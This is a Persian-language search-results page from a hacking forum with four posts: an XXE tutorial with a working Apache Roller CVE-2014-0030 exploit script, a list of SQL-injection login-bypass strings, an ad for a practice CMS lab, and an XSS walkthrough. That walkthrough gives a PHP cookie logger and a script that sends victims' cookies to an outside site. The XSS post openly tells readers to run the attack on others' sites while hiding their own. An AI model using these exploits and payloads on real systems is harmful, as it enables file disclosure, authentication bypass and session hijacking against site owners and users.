discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'web application bug'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

4 نتیجه پیدا شد

  1. با سلام خدمت دوستان عزیز با اموزش اسیب پذیری XXE یا XML External Entity در خدمت شما هستیم . توضیجات اولیه :‌ با استفاده از این اسیب پذیری شما قادر به دسترسی به فایل های سمت سرور و سیستمی دارید این اسیب پذیری سمت سرور است و زمانی رخ میده که ارسال ورودی xml انجام شده باشه و بر ورودی ها نظارت نباشه و خوب کانفیگ نکرده باشن ، از مزایای دیگر اسیب پذیری میتوان به استخراج اطلاعات حساس اسکن پورت های باز و جعل درخواست سمت سرور رو انجام داد ، ضعفی که باعث می شود این آسیب پذیری به وجود آید سمت سرور است که با دستورات XML Parser انجام میشود و اگردرخوست های ورودی توسط کلاینت به سرور رو خوب کنترل نکرده باشند باعث میشه که نفوذگر با استفاده از دستورات XML Parser اقدام به حمله کند . آشنایی با XML Parser : XML Parser یک آبجکتی است که اکثر مرورگر ها اونو ساپورت می کنند می توانید داکیومنت ها و اطلاعات را نیز استخراج کند و همچنین اقدام به خواندن تگ های XML کنید . XPath Injection : اسیب پذیری XXE Injection خیلی شباهت داره به اسیب پذیری Xpath Injection که قبلا اموزشش رو در انجمن قرار دادم :‌ انواع حملات XXE : : Exploiting XXE to retrieve file در این حمله استخراج اطلاعات صورت میگیرد : Exploiting XXE to Perform SSRF attack در این حمله امکان ترکیب اسیب پذیری SSRF هم وجود دارد . :‌ Exploiting Blind XXE exfiltrate data out-of-band این حمله زمانی صورت می گیره که داده های حساس در حال انتقال از میان سرور و کاربر هستند و جایی که داده ها از سرور برنامه به سیستمی منتقل می شوند و هکر می تواند آن ها رو کنترل کند . توی این جلسه قراره به حمله Exploiting XXE to retrieve file بپردازیم : برای مثال شما یک فرم رو سابمیت میکنید یا هر چیز دیگه بعد با استفاده از ابزار Burp Suite درخواست ها رو برسی میکنید و برای مثال این کد رو مشاهده میکنید :‌ <?xml version=”1.0” encoding=”UTF-8”?> و در این تگ برخی از این پارامتر ها اومده :‌ <stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> حالا اگر بین این دو تگ این دستور xml رو قرار دهید و پارامتر ۲ را تغییر دهید فایل passwd رو فراخوانی میکنه : <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> کد اولیه (بدون هیچ تغییر ) :‌ <?xml version=”1.0” encoding=”UTF-8”?><stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> و تبدیلش میکنیم به این :‌ <?xml version=”1.0” encoding=”UTF-8”?> <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> <stockCheck><productld>&xxe;</productld><storeld>1</storeld></stockCheck> و توی پاسخ میبینید که فایل passwd رو فراخوانی کرده ، در ضمن باید توی burp از قسمت repeater اقدام کنید . ویدئو : تئوری . پروژه محور یک . پروژه محور دو . اکسپلویت :‌ # Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) # Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" # Date: 2018-09-05 # Exploit Author: Marko Jokic # Contact: http://twitter.com/_MarkoJokic # Vendor Homepage: http://roller.apache.org/ # Software Link: http://archive.apache.org/dist/roller/ # Version: < 5.0.3 # Tested on: Linux Ubuntu 14.04.1 # CVE : CVE-2014-0030 # This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. # There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. # 'SIMPLE' payload will work in most cases and will be used by default, if # server errors out, use 'ADVANCED' payload. # 'ADVANCED' payload will start local web server and serve malicious XML which # will be parsed by a target server. # To successfully perform attack with 'ADVANCED' payload, make sure that port # you listen on (--lport flag) is accessible out of the network. #!/usr/bin/env python import SimpleHTTPServer import SocketServer import argparse import sys import threading from xml.etree import ElementTree import urllib3 import requests SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file://{}">]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file://{}"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "{}"> %dtd; ]> <methodCall> <methodName>&all;</methodName> </methodCall> """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<!ENTITY all "%start;%xxe;%end;">') def check_exploit(host): response = requests.post(host + "/roller-services/xmlrpc", verify=False) if response.status_code == 200: return True return False def exploit(host, payload): response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) xml_tree = ElementTree.fromstring(response.text) parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text print parsed_response def start_web_server(port): handler = MyHandler httpd = SocketServer.TCPServer(('', port), handler, False) httpd.allow_reuse_address = True httpd.server_bind() httpd.server_activate() httpd.handle_request() httpd.shutdown() def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") args = parser.parse_args() host = args.url full_file_path = args.file advanced = False lhost = args.lhost lport = args.lport if lport is not None and lport is not None: advanced = True check = check_exploit(host) if check: if advanced: th = threading.Thread(target=start_web_server, args=(lport,)) th.daemon = True th.start() payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport)) else: payload = SIMPLE_PAYLOAD.format(full_file_path) exploit(host, payload) else: print "[-] TARGET IS NOT VULNERABLE!" main() مقاله : یک سری مقاله که میتونه خیلی مفید باشه . Owasp : https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing Owasp : https://owasp.org/www-chapter-pune/XXE_Exploitation.pdf Doddsecurity : https://doddsecurity.com/312/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system Medium : https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b Exploit DB : https://www.exploit-db.com/docs/48583 ====================================================================== لایک فراموش نشه ، موفق و پیروز باشید .
  2. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  3. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  4. MR.MSA

    آموزش باگ xss

    با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار :‌ با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ :‌ برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید :‌ <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="http://site.com/xss.php?c=" + document.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : http://site.com/cookie.html و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موق و پیروز باشید .